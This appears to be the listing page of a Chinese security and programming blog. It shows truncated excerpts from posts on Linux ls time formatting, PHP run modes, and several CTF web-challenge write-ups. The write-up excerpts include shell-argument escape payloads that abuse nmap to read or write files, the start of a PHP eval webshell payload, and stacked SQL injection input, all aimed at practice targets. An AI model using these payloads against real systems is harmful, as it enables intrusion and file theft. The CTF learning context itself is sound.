Apr122022
linux下修改ls显示的时间格式
linux 下修改 ls 命令显示的时间格式,两种方式。
1.修改ls显示格式
ls -l --time-style '+%Y-%m-%d %H:%M:%S'
drwxr-x--- 2 yhm yhm 4096 2019-01-03 21:08:45 phpernote
2.修改配置到bash_profile
vi ~/.bash_profile
export TIME_STYLE='+%Y/%m/%d %H:%M:%S'
cat ~/.bash_profile | grep TIME
source ~/.bash_profile
阅读全文
抢沙发
Mar272022
PHP常见的运行模式
关于PHP目前比较常见的五大运行模式:
1)CGI(通用网关接口/ Common Gateway Interface)
2)FastCGI(常驻型CGI / Long-Live CGI)
3)CLI(命令行运行 / Command Line Interface)
4)Web模块模式(Apache等Web服务器运行的模式)
5)ISAPI(Internet Server Application Program Interface)
备注:在PHP5.3以后,PHP不再有ISAPI模式,安装后也不再有php5isapi.dll这个文件。要在IIS6...阅读全文
Mar182022
BUUCTF-[BUUCTF 2018]Online Tool(单引号逃逸、nmap写文件)
![BUUCTF-[BUUCTF 2018]Online Tool(单引号逃逸、nmap写文件)](/wp-content/uploads/d/1dccb1038a8a3266b6ecf4653c2fc81d.png)
知识点
escapeshellarg 函数的用法
escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数
功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() ,执行运算符(反引号)
定义 :string escapeshellarg ( string $arg )
具体功能作用举例如下:
<?php...阅读全文
Mar182022
CTFHub_浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维(data协议、php://filter协议读文件、反序列化)
进入场景,显示源代码
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
echo "Not now!";
exit();
...阅读全文
Mar182022
CTFHub_2021-第五空间智能安全大赛-Web-pklovecloud(反序列化)
打开场景,显示源码
<?php
include 'flag.php';
class pkshow
{
function echo_name()
{
return "Pk very safe^.^";
}
}
class acp
{
protected $cinder;
public $neutron;
public $nova;
function __construct()
{
$this->cinder = new pkshow;
}
function __toString() ...阅读全文
Mar182022
CTFHub_2020-网鼎杯-朱雀组-Web-nmap(单引号逃逸、nmap写文件)
进入场景,显示如下
F12发现注释中的提示
<!-- flag is in /flag -->
本题考察 单引号逃逸 和 nmap写文件,与[BUUCTF 2018]Online Tool类似
直接使用里面的paload
利用方式一
payload
' -iL /flag -oN flag.txt '
执行payload,将根目录下的flag文件内容作为扫描目标,并将扫描结果重定向到flag.txt文件中
访问该文件,成功拿到flag
利用方式二
payload
' <?php @eval($_P...阅读全文
Mar112022
解决SQL代码中的Error 1064 – Access denied问题
问题背景
在使用SQL语句操作数据库的过程中,有时候会遇到Error 1064 - Access denied错误。这个错误通常是因为当前用户没有足够的权限执行所要求的操作而导致的。本篇博客将介绍如何解决这个问题并提供一些常见的解决方案。
错误原因
Error 1064 - Access denied错误通常是由以下几种原因引起的:
当前用户没有足够的权限执行所要求的操作。
SQL语句语法错误导致数据库拒绝执行。
数据...阅读全文
Mar112022
CTFHub_SUCTF-2019-Web-easysql(堆叠注入)
打开靶场,显示如下
burp跑一遍sql关键字,以下响应长度是629的是本题过滤的字段
经过测试,发现未过滤堆叠注入
查看表名
1;show tables;#
方法一
看wp知道后端查询语句如下,这是一种非预期解的方法:
$sql = "select ".$post['query']."||flag from Flag";
所以我们前端构造语句 *,1 这样sql的语句就是这样的了
select *,1||flag from Flag
方法二
通过堆叠注入将sql_mode...阅读全文
Mar112022
CTFHub_2021-第五空间智能安全大赛-Web-yet_another_mysql_injection(quine注入)
转载自:https://blog.csdn.net/m0_53065491/article/details/122478401
进入场景,是个登录框
f12找到提示,拿到源码
源代码如下
<?php
include_once("lib.php");
function alertMes($mes,$url){
die("<script>alert('{$mes}');location.href='{$url}';</script>");
}
function checkSql($s) {
if(preg_match("/regexp|between|in|flag|=|>|<|and|\||r...阅读全文
Mar112022
CTFHub_2021-津门杯-Web-hate_php(通配符绕过正则匹配)
2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php
打开场景,显示源代码
<?php
error_reporting(0);
if(!isset($_GET['code'])){
highlight_file(__FILE__);
}else{
$code = $_GET['code'];
if(preg_match("/[A-Za-z0-9_$@]+/",$code)){
die('fighting!');
}
eval($code);
}
代码审计后,发现对输入code进行了正则表达式匹配,过滤了英文大小写字母、数字和_...阅读全文